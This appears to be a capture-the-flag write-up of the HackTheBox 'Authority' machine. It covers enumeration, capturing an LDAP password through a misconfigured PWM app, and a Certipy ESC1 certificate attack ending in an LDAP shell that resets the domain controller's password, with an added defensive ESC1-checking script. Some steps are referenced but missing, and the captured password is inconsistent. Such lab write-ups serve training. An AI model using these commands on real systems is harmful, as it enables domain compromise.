Authority is a medium-difficulty Windows machine that highlights the dangers of misconfigurations, password reuse, storing credentials on shares, and demonstrates how default settings in Active Directory (such as the ability for all domain users to add up to 10 computers to the domain) can be combined with other issues (vulnerable AD CS certificate templates) to take over a domain.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
8443/tcp open https-alt
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -p53,80,88,135,139,389,445,8443 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: authority.htb)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2024-11-09T16:43:18+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
636/tcp open ldapssl
8443/tcp open ssl/https-alt
..snip..
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time:
| date: 2024-11-09T16:43:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Summary
* Open ports: 53,80,88,135,139,389,445,8443
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - RPC - SMB - KERBEROS - LDAP
* Important notes: Domain: authority.htb
After discovering the open ports and updating the /etc/hosts file, I will enumerate the running services one by one.
HTTP Enumeration
Visiting http://authority.htb/ shows the default IIS page.
Fuzzing the website returned nothing for either directories or files, so I will move on to the web app on port 8443.
Visiting http://authority.htb:8443/ returns a message that the service requires TLS, so I will access it over https instead.
Visiting the same URL over https redirects me to https://authority.htb:8443/pwm/private/login
This message states that the web app is in Configuration mode, which allows updating the configuration without LDAP authentication.
There are also two buttons here, and both lead to the same page.
I can see an LDAP distinguished name here with the username svc_pwm and the domain components htb.corp.
When I tried to authenticate with *:* (to test for LDAP injection), I got an error that reveals another username, svc_ldap. I get the same error with any other credentials.
There is not much more I can do here, so I will move on to the other services (SMB, Kerberos, etc.).
Kerberos Enumeration
Unfortunately, this user can't be AS-REP roasted (pre-authentication is required):
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-GetNPUsers authority.htb/svc_ldap@10.10.11.222 -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc_ldap@10.10.11.222
[-] User svc_ldap@10.10.11.222 doesn't have UF_DONT_REQUIRE_PREAUTH set
SMB & RPC Enumeration
A null session gives no data over RPC:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
Here I can see that I have READ access on the Development share.
There are several files in this share that are of no use, but I can see an ADCS folder, which might indicate that a PKI exists.
I ran the command and it asked for a password, so I supplied Welcome1 (found earlier), but it gave me this error:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible-vault decrypt main.yml
Vault password:
ERROR! input is not vault encrypted data. /home/kali/HackTheBox/platform/machines/Authority/main.yml is not a vault encrypted file for /home/kali/HackTheBox/platform/machines/Authority/main.yml
I realised I had done something wrong: I should extract the hashes of these secrets and crack them to recover the correct password.
I then realised that this is a dead end because svc_pwm can't authenticate to LDAP either. I will try the credential against the web app on port 8443.
The password worked only on the Configuration Manager tab, not on the main login form.
Under Configuration Editor there is a Connection tab with several fields, and I can see that the svc_ldap user's credentials are stored on the server and used to connect to ldaps://authority.authority.htb:636. If I change this value to my host's IP, I can capture the credentials.
Then I click on Test LDAP Profile:
svc_ldap:htblDaP_1n_th3_cle4r!
Now I have a valid domain account, access to WinRM, and confirmation that AD CS exists.
Since AD CS exists, I will check for vulnerable templates with Certipy:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
..snip..
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
..snip..
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
Domain Computers can abuse ESC1 to obtain Domain Admin privileges by specifying the "subject alternative name" of a privileged domain user (Administrator), and I can create a computer account myself if the machine account quota is not set to zero.
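As an added, defender-side example (not from the writeup or from Certipy), the following script applies the ESC1 conditions reported above to a template's AD attributes, together with the machine account quota that decides whether a "Domain Computers" enrollment right is reachable by any domain user; the attribute names are the real AD CS schema names, but the sample template values are constructed, not read from the box.

```python
# Added example (not from the writeup or Certipy): applies the ESC1 conditions
# reported above to a template's AD attributes, together with the machine
# account quota that decides whether any user can reach "Domain Computers".
# Attribute names are real AD CS schema names; sample values are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag
AUTH_EKUS = {                            # EKUs usable for domain logon
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Authenticated Users", "Everyone"}

def esc1_findings(template: dict, machine_account_quota: int) -> list:
    """Return why a template is ESC1-exploitable; an empty list means safe."""
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []  # subject is built from AD, requester cannot pick a UPN
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return []  # CA manager approval stops automatic issuance
    if template["msPKI-RA-Signature"] > 0:
        return []  # required co-signatures stop self-service requests
    ekus = set(template["pKIExtendedKeyUsage"])
    if ekus and not ekus & AUTH_EKUS:
        return []  # no logon EKU (an empty EKU list means any purpose)
    enrollers = set(template["enrollment-rights"])
    reasons = []
    if enrollers & LOW_PRIV:
        reasons.append("low-privileged principals can enroll")
    # While the quota is above zero any user can add a computer, so a
    # Domain Computers enrollment right is effectively open to everyone.
    if "Domain Computers" in enrollers and machine_account_quota > 0:
        reasons.append(f"Domain Computers can enroll, MachineAccountQuota={machine_account_quota}")
    return reasons

def hardened(template: dict) -> dict:
    """Template-side fix: the CA, not the requester, sets the subject."""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    return fixed

CORP_VPN = {  # constructed sample shaped like the CorpVPN finding
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment-rights": ["Domain Computers", "Domain Admins"],
}

if __name__ == "__main__":
    print(esc1_findings(CORP_VPN, 10), esc1_findings(CORP_VPN, 0))
```

Setting ms-DS-MachineAccountQuota to 0 closes the path for ordinary users, while clearing the enrollee-supplies-subject flag (or requiring manager approval) fixes the template itself.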
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy req -u 'blind0bandit$@authority.htb' -p 'blind0bandit@@!!!@@' -ca AUTHORITY-CA -template CorpVPN -upn administrator@authority.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
I get KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type), which means the KDC does not support PKINIT. Fortunately, Certipy has the -ldap-shell option, which authenticates with the certificate over LDAPS instead of Kerberos:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Connecting to 'ldaps://10.10.11.222:636'
[*] Authenticated to '10.10.11.222' as: u:HTB\Administrator
Type help for list of commands
# change_password 'authority$'
Got User DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Attempting to set new password of: X!xJ#)>|HFPi";;
Password changed successfully!
I changed the password of the DC machine account rather than the Administrator account to minimize the damage.